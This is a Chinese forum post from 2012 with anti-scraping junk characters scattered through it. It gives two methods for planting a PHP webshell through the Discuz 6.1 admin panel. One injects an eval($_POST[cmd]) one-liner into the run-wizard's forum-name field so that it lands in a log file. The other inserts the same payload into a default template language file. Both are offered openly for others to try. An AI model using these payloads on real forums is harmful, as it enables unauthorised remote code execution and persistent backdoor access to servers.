discuz6.1两种方法后台拿shell
6 ^; j" d6 Y5 b好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下! ]% k4 Z, d: s3 I9 n+ {
1:
* c5 J4 R" v& Yhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
6 M9 d6 g2 x0 @ I2 W7 @- h) Xadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell: x5 B2 c( Z, {' o6 [
<?php eval($_POST[cmd]);?>! S' V; I" h$ w p6 Q" N
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php2 K1 |! m: c# |
9 @" ^: I7 B% i/ ]: t
* j6 _2 @6 N" k' v
2:后台模板管理--默认模板套系--详情, c% K1 F* H6 x9 y2 D9 E0 ^
templates/default/actions.lang.php
5 {6 p5 B; Y2 r7 G, `/ r' }6 fjhackj\\');eval($_POST[cmd])?>;//
G% |9 O/ A$ X( y' \6 D a2 {& Y0 t. u7 {( q" E9 {& u6 x# y/ h
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对